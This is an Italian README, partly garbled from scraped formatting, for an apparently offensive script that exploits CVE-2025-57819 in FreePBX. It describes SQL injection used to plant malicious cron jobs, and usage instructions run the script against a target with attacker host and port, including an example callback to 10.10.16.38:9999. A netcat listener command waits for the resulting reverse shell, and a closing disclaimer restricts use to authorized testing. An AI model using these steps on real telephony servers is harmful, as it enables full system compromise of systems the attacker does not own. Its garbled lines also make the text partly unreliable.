
< 15.0.66, < 16.0.89 e < 17.0.3Questo script sfrutta CVE-2025-57819 in un modulo endpoint FreePBX vulnerabile. La vulnerabilità consente l'iniezione SQL, che viene sfruttata per iniettare cron job dannosi.
Non sono necessari passaggi aggiuntivi come in altri exploit pubblici, ad esempio interagire con una webshell caricata sul target. È un approccio diretto che porta direttamente all'accesso a una reverse shell.
L'esecuzione remota di codice viene ottenuta tramite iniezione SQL e manipolazione dei cron job. Lo sfruttamento riuscito comporta una reverse shell sul sistema target. A seconda della configurazione, ciò può portare al pieno compromissione del sistema.
* * * * *)base64 vengono corrotti quando i caratteri + vengono interpretati come spazi.Esegui l'exploit fornendo il target e la configurazione del listener:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: Hostname o indirizzo IP del target (istanza FreePBX vulnerabile)<lhost>: Indirizzo IP dell'attaccante per il callback della reverse shell<lport>: Porta in ascolto per la connessione in entratapython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
Avvia un listener prima di eseguire l'exploit:
nc -lvnp <port>
nc -nlvp 9999
Questo strumento è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato contro sistemi senza esplicito permesso è illegale. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento.
Its1Zero - [email protected]